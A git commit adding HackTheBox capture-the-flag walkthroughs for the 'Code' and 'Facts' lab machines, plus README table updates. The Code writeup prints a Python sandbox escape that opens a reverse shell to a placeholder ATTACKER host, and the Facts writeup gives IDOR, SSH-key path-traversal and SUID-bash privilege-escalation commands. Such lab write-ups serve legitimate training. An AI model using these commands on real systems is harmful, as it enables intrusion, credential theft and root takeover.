Add 41 new HTB machine entries + 11 dedicated Season 9-10 writeups

Coverage:
- Easy +12: Data, Retro, Code, TheFrizz, CodeTwo, Job, Facts, WingData, CCTV, Kobold, Eloquia, Certified
- Medium +14: Helix, PingPong, Logging, DevArea, Interpreter, VariaType, Principal, Soulmate, Slonik, Bamboo, JobTwo, Imagery, HackNet, Store
- Hard +10: Eighteen, Pirate, Gavel, Barrier, Guardian, Bruno, Giveback, Breach, Signed (Hard), AirTouch
- Insane +5: Sorcery, Pterodactyl, Cobblestone, MonitorsFour, Overwatch

Dedicated writeup files (Sink-style) for 11 high-value machines:
- Easy/Facts (Camaleon CMS IDOR + path traversal + facter sudo)
- Easy/Kobold (MCPJam CVE-2026-23744 + docker group escape)
- Easy/Code (Python keyword filter bypass + backy sudo)
- Medium/Helix (Apache NiFi ExecuteSQL + H2 alias RCE)
- Medium/Interpreter (Mirth Connect CVE-2023-43208 + Python eval)
- Medium/VariaType (fontTools/FontForge/setuptools CVE chain)
- Hard/Pirate (Pre2k + gMSA + PetitPotam + RBCD + S4U SPN jack)
- Hard/PingPong (multi-forest AD, MSSQL delegation, ADCS)
- Hard/Eighteen (Win Server 2025, Bad Successor CVE-2025-53779)
- Hard/AirTouch (WPA2 + Evil Twin + PEAP-MSCHAPv2)
- Insane/MonitorsFour (Cacti type juggling + Docker API escape)
- Insane/Sorcery (Cypher injection + WebAuthn XSS + Kafka + FreeIPA)
- Insane/Pterodactyl (panel CVE-2025-49132 + PEAR pearcmd + PwnKit)
- Insane/Cobblestone (second-order SQLi + Twig SSTI + Cobbler RCE)

Author: momenbasel

README.md

@@ -58,16 +58,31 @@ Writeups for retired HTB machines organized by difficulty. Each writeup includes
 
 | Difficulty | Path | Machines |
 |------------|------|----------|
-| Easy | [`machines/easy/`](machines/easy/) | 120+ |
-| Medium | [`machines/medium/`](machines/medium/) | 112+ |
-| Hard | [`machines/hard/`](machines/hard/) | 60+ |
-| Insane | [`machines/insane/`](machines/insane/) | 25+ |
+| Easy | [`machines/easy/`](machines/easy/) | 132+ |
+| Medium | [`machines/medium/`](machines/medium/) | 136+ |
+| Hard | [`machines/hard/`](machines/hard/) | 70+ |
+| Insane | [`machines/insane/`](machines/insane/) | 50+ |
 
 ### Recently Retired (2025-2026)
 
 | Machine | OS | Difficulty | Key Techniques | Date |
 |---------|----|------------|----------------|------|
+| [MonitorsFour](machines/insane/MonitorsFour/) | Windows | Insane | PHP Type Juggling, Cacti CVE, Docker API Escape | May 2026 |
+| [Pterodactyl](machines/insane/Pterodactyl/) | openSUSE | Insane | Pterodactyl Panel CVE-2025-49132, PEAR pearcmd LFI, Polkit | May 2026 |
+| [Helix](machines/medium/Helix/) | Linux | Medium | Apache NiFi ExecuteSQL + H2 Java Alias RCE | May 2026 |
+| [Overwatch](https://0xdf.gitlab.io/2026/05/09/htb-overwatch.html) | Windows | Insane | .NET Reversing, WCF Service Injection, DNS | May 2026 |
+| [Sorcery](machines/insane/Sorcery/) | Linux | Insane | Cypher Injection, WebAuthn XSS, Kafka, FreeIPA | Apr 2026 |
+| [PingPong](machines/hard/PingPong/) | Windows | Hard | Multi-Forest AD, MSSQL Delegation, ADCS | Apr 2026 |
+| [AirTouch](machines/hard/AirTouch/) | Linux | Hard | 802.11 WPA2 Crack, Evil Twin, PEAP-MSCHAPv2 | Apr 2026 |
+| [Eighteen](machines/hard/Eighteen/) | Windows | Hard | Win Server 2025, MSSQL Impersonation, Bad Successor dMSA | Apr 2026 |
 | [DarkZero](https://0xdf.gitlab.io/2026/04/04/htb-darkzero.html) | Windows | Hard | Cross-Forest Trust, AD Abuse | Apr 2026 |
+| [Pirate](machines/hard/Pirate/) | Windows | Hard | Pre2k, gMSA, PetitPotam, RBCD, S4U SPN Jack | Feb 2026 |
+| [VariaType](machines/medium/VariaType/) | Linux | Medium | fontTools CVE-2025-66034, FontForge CVE-2024-25082 | Mar 2026 |
+| [Interpreter](machines/medium/Interpreter/) | Linux | Medium | Mirth Connect CVE-2023-43208, Python eval() | Feb 2026 |
+| [Kobold](machines/easy/Kobold/) | Linux | Easy | MCPJam CVE-2026-23744, Docker Group | Mar 2026 |
+| [Facts](machines/easy/Facts/) | Linux | Easy | Camaleon CMS IDOR + Path Traversal + Facter Sudo | Jan 2026 |
+| [Code](machines/easy/Code/) | Linux | Easy | Python Sandbox Bypass, Backy Sudo | Aug 2025 |
+| [Cobblestone](machines/insane/Cobblestone/) | Linux | Insane | Second-Order SQLi, Twig SSTI, Cobbler XMLRPC | 2025 |
 | [Snapped](https://0xdf.gitlab.io/2026/04/01/htb-snapped.html) | Linux | Hard | Nginx UI RCE, Static Site Exploitation | Mar 2026 |
 | [Browsed](https://0xdf.gitlab.io/2026/03/28/htb-browsed.html) | Linux | Medium | Browser Extension Exploitation, Headless Chrome | Mar 2026 |
 | [Previous](https://0xdf.gitlab.io/2026/01/10/htb-previous.html) | Linux | Medium | NextJS Exploitation, Framework Abuse | Jan 2026 |

machines/easy/Code/README.md

@@ -0,0 +1,121 @@
+---
+layout: default
+title: "Code"
+parent: Easy Machines
+grand_parent: Machines
+permalink: /machines/easy/code/
+---
+
+# Code
+
+![Machine Badge](https://img.shields.io/badge/Machine-Code-blue)
+![OS](https://img.shields.io/badge/OS-Linux-orange)
+![Difficulty](https://img.shields.io/badge/Difficulty-Easy-green)
+
+| Property | Value |
+|----------|-------|
+| **OS** | Linux |
+| **Difficulty** | Easy |
+| **Release** | 2025-08-02 |
+| **Tags** | #python #sandbox-escape #keyword-filter #subprocess #backy #sudo |
+
+---
+
+## Summary
+
+Code is a Python in-browser code editor. Dangerous keywords (e.g. `import`, `os`, `subprocess`, `exec`, `eval`, `open`, `__`) are blocklisted - but only string-based, so the **execution environment still holds dangerous objects in memory**. By walking the object graph via `().__class__.__base__.__subclasses__()` and selecting `subprocess.Popen` by **numeric index** (commonly 317), the filter is bypassed and arbitrary commands run. Post-shell, web-app SQLite holds bcrypt creds; root falls to a `sudo` rule for **`/usr/bin/backy.sh`** that allows path-traversal in the JSON config to read `/root/root.txt`.
+
+---
+
+## External Writeups
+
+- [0xdf](https://0xdf.gitlab.io/2025/08/02/htb-code.html)
+- [Medium - CN-0x](https://medium.com/@CN-0x/code-hackthebox-writeup-7e73abc59aee)
+- [Medium - damarabrianr](https://medium.com/@damarabrianr/hackthebox-code-writeup-from-python-sandbox-escape-to-root-via-json-bypass-16d668bd307e)
+- [Axura](https://4xura.com/ctf/htb-writeup-code/)
+- [BugsWithBlas](https://bugswithblas.com/posts/code-htb-writeup/)
+
+---
+
+## Key Techniques
+
+- Python sandbox escape via subclass enumeration
+- String-based keyword blocklists are insufficient (objects remain reachable)
+- `().__class__.__base__.__subclasses__()` -> `subprocess.Popen`
+- Avoiding banned identifiers using index access and chained attribute lookups
+- bcrypt hash cracking with `hashcat -m 3200`
+- `backy` (Python backup tool) JSON config `directories_to_archive` path traversal under `sudo`
+
+---
+
+## Attack Path
+
+### 1. Recon
+
+```bash
+nmap -p- --min-rate=10000 -sV -sC code.htb
+# 22  ssh
+# 5000  http -> Flask: Python Playground
+```
+
+### 2. Sandbox Escape
+
+The editor filters tokens like `import`, `os`, `exec`, `eval`, `__class__`, `subprocess`, but the runtime still has every loaded class. Use list-indexing to never name a banned token:
+
+```python
+# Find subprocess.Popen index (varies; iterate or precompute)
+for i, c in enumerate(().__class__.__mro__[-1].__subclasses__()):
+    if c.__name__ == 'Popen': print(i)
+# e.g. 317
+
+# Bypass: avoid "__" by hex-rope construction, or wrap in getattr()
+P = ().__class__.__mro__[-1].__subclasses__()[317]
+P(['bash','-c','bash -i >& /dev/tcp/ATTACKER/4444 0>&1'])
+```
+
+Common variant uses chained attribute strings via `getattr`/`type` to dodge the `__` filter when it is regex-based.
+
+Shell as `app-production`.
+
+### 3. User Pivot
+
+Site SQLite (`/var/www/app/instance/database.db`) holds bcrypt hashes for `martin` and others. Crack:
+
+```bash
+hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
+# martin:nafeelswordsmaster
+```
+
+`su martin` (or SSH as `martin`).
+
+### 4. Root via Sudo Backy
+
+```bash
+sudo -l
+# (root) NOPASSWD: /usr/bin/backy.sh /root/backy.conf
+```
+
+`backy.sh` reads the JSON config and tar-archives `directories_to_archive`. The path validation in `task.py` strips `/root` but **not** `..`:
+
+```bash
+mkdir /tmp/exf && cd /tmp/exf
+cat > cfg.json <<'EOF'
+{
+  "destination": "/tmp/exf/",
+  "multiprocessing": true,
+  "verbose_log": false,
+  "directories_to_archive": ["/root/..//root/"]
+}
+EOF
+sudo /usr/bin/backy.sh /tmp/exf/cfg.json
+# extract /tmp/exf/code-{date}.tar.bz2 -> root.txt, /root/.ssh/id_rsa
+```
+
+---
+
+## Lessons Learned
+
+- Blocklist filters are bypassable; allowlists or proper sandboxes (e.g. `RestrictedPython`, gVisor, eBPF policies) are necessary.
+- Once the runtime has dangerous classes, every identifier access is an attack surface - indexing, `getattr`, `__dict__` lookups all work.
+- `sudo` to a script that consumes a JSON/YAML config is equivalent to `sudo` to whatever the script lets the config control.
+- `..` is still the most reliable path-traversal token in 2026.

machines/easy/Facts/README.md

@@ -0,0 +1,122 @@
+---
+layout: default
+title: "Facts"
+parent: Easy Machines
+grand_parent: Machines
+permalink: /machines/easy/facts/
+---
+
+# Facts
+
+![Machine Badge](https://img.shields.io/badge/Machine-Facts-blue)
+![OS](https://img.shields.io/badge/OS-Linux-orange)
+![Difficulty](https://img.shields.io/badge/Difficulty-Easy-green)
+![Season](https://img.shields.io/badge/Season-10%20Week%201-purple)
+
+| Property | Value |
+|----------|-------|
+| **OS** | Linux (Ubuntu) |
+| **Difficulty** | Easy |
+| **Release** | 2026-01-31 (Season 10, Week 1) |
+| **Tags** | #web #idor #path-traversal #s3 #minio #ruby #sudo |
+
+---
+
+## Summary
+
+Facts is the first machine of HTB Season 10 (Underground). It features a Ruby on Rails CMS called **Camaleon CMS** running with a path traversal vulnerability and an IDOR in the admin registration/update flow. Cloud storage credentials harvested from the CMS settings unlock a MinIO bucket holding the user's SSH private key. Root is achieved by abusing `sudo facter --custom-dir=`, which executes the first `.rb` script in the supplied directory as root.
+
+---
+
+## External Writeups
+
+- [GitHub: lightbringer999/FACTS-HTB](https://github.com/lightbringer999/FACTS-HTB)
+- [Medium - ItsSunshineXD (EN)](https://itssunshinexd.medium.com/htb-machine-facts-writeup-en-9db1ec215330)
+- [Medium - wahyudnWis (S10)](https://medium.com/@mwahyudinwisesar/facts-s10-htb-writeup-3f6369768e57)
+- [Ibrahim Isiaq Bolaji - Facts Walkthrough](https://www.ibrahimisiaqbolaji.com/2026/02/facts-hack-box-walkthrough.html)
+- [CyberSecGuru: Mastering Facts](https://thecybersecguru.com/ctf-walkthroughs/mastering-facts-beginners-guide-from-hackthebox/)
+- [GitHub: CyberWarrior9 - Facts walkthrough](https://github.com/CyberWarrior9/HTB-Walkthroughs/blob/main/Facts/facts_htb_writeup.md)
+- [HackMD - Facts Writeup](https://hackmd.io/wWxm2lupSjC-Ir5ELV6KVg)
+- [1337 Sheets - FACTS Easy (Jan 31, 2026)](https://1337sheets.com/hack-the-box-season-htb-facts-writeup-easy-weekly-january/)
+
+---
+
+## Key Techniques
+
+- IDOR on `/admin/users/{id}` (mass-assignment of `role`)
+- Camaleon CMS v2.9.0 Path Traversal in `download_private_file` (auth required, critical)
+- MinIO / S3-compatible object storage credential extraction
+- SSH private key recovery from misconfigured bucket
+- `sudo facter --custom-dir=` Ruby arbitrary file execution
+- Hardcoded plaintext cloud storage credentials in CMS settings
+
+---
+
+## Attack Path
+
+### 1. Recon
+
+```bash
+nmap -p- --min-rate=10000 -sV -sC facts.htb
+# 22/tcp  ssh
+# 80/tcp  nginx -> Camaleon CMS (Ruby on Rails)
+```
+
+Add `facts.htb` to `/etc/hosts`. Browse the site, locate `/admin/register`.
+
+### 2. Foothold via IDOR
+
+Register a low-privilege user. Camaleon's profile-update endpoint allows updating arbitrary attributes for any user (including `role`). Promote your account to `admin`:
+
+```bash
+curl -X PATCH http://facts.htb/admin/users/1 \
+  -H "Cookie: _camaleon_session=<sess>" \
+  -d "user[role]=admin"
+```
+
+### 3. Path Traversal (User Flag / SSH Key)
+
+With admin access, `download_private_file` traverses outside the media root:
+
+```
+GET /admin/media/download_private_file?file=../../../../../home/sherman/.ssh/id_rsa
+```
+
+SSH in as the recovered user.
+
+### 4. Cloud Storage Pivot
+
+Inside `Settings -> General Site -> Filesystem Settings`, the CMS is wired to an S3-compatible MinIO bucket with plaintext access key + secret. Use `mc` or `aws s3 --endpoint-url`:
+
+```bash
+aws --endpoint-url http://facts.htb:9000 s3 ls
+aws --endpoint-url http://facts.htb:9000 s3 cp s3://backups/id_rsa -
+```
+
+### 5. Root via Sudo Facter
+
+```bash
+sudo -l
+# (root) NOPASSWD: /usr/bin/facter --custom-dir=*
+```
+
+`facter` loads the first `.rb` file from the custom-dir path with Ruby; running as root means arbitrary code execution as root:
+
+```bash
+mkdir /tmp/pwn
+cat > /tmp/pwn/pwn.rb <<'EOF'
+Facter.add(:pwn) { setcode { system("chmod +s /bin/bash") } }
+EOF
+sudo /usr/bin/facter --custom-dir=/tmp/pwn
+/bin/bash -p
+# uid=1000(sherman) euid=0(root)
+```
+
+---
+
+## Lessons Learned
+
+- IDOR on role/privilege fields is still common in CMS frameworks - always test mass-assignment.
+- Cloud storage credentials in CMS settings are a frequent secrets-in-config sink.
+- `sudo` rules with `--custom-dir=*` or any `*` wildcard at the end of a Ruby/Python loader path are RCE-as-root.
+- Camaleon CMS path traversal (no CVE assigned at retirement) underscores the value of reading source for new/niche CMS frameworks.